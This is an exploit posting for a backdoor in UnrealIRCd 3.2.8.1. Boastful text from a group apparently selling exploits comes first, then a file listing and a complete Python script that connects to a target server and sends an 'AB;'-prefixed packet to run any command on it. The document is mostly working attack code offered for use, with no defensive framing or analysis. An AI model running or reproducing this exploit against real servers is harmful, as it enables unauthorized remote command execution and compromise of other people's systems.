Unreal IRCD 3.2.8.1 Remote Backdoor

`  
It seems as if our backdoor was found so we figured we cant sell this in the ac1db1tch3z   
CANVAS pack (PhosphoricAc1d Exploit pack).  
  
P.S. Since it took months and months for the community to find the system() exploit,  
we still have a more complicated zerday unrealircd hack module. Please inquire  
when our website is finished.  
  
Brought to you by Ac1dB1tch3z: still using system() like it was 1992AD,   
and still owning everyone with it. Thanks.  
------------------------------------------------------------------------  
  
$ stat ABunreal.py   
File: `ABunreal.py'  
Size: 830 Blocks: 8 IO Block: 4096 regular file  
Device: fd02h/64770d Inode: 16891994 Links: 1  
Access: (0777/-rwxrwxrwx) Uid: ( 1003/ ag) Gid: ( 1010/ ag)  
Access: 2010-04-05 14:26:14.000000000 -0400  
Modify: 2009-11-10 00:04:33.000000000 -0500  
Change: 2010-04-05 14:26:59.000000000 -0400  
  
------------------------------------------------------------------------  
  
#!/usr/bin/env python  
# Ac1db1tch3z 09   
  
import sys  
import socket  
import struct  
  
def injectcode(host, port, command):  
  
host1 = host  
port1 = int(port)  
cmd = command  
  
print "!#@#@! Ac1db1tch3z is just Unreal #@!#%%\n"  
print "- Attacking %s on port %d"%(host1,port1)  
print "- sending command: %s"%cmd  
  
packet = "AB" +";"+ cmd + ";"+"\n"  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
try:  
s.connect((host1, port1))  
except socket.error:  
print "No connection..."  
return 0  
s.sendall(packet)  
blah = s.recv(5000)  
print blah  
s.close()  
  
if __name__ == "__main__":  
if len(sys.argv) == 1:  
print "Usage:", sys.argv[0], "<target host> <target port> <command>"  
print  
sys.exit(1)  
else:  
injectcode(sys.argv[1],sys.argv[2],sys.argv[3])  
  
`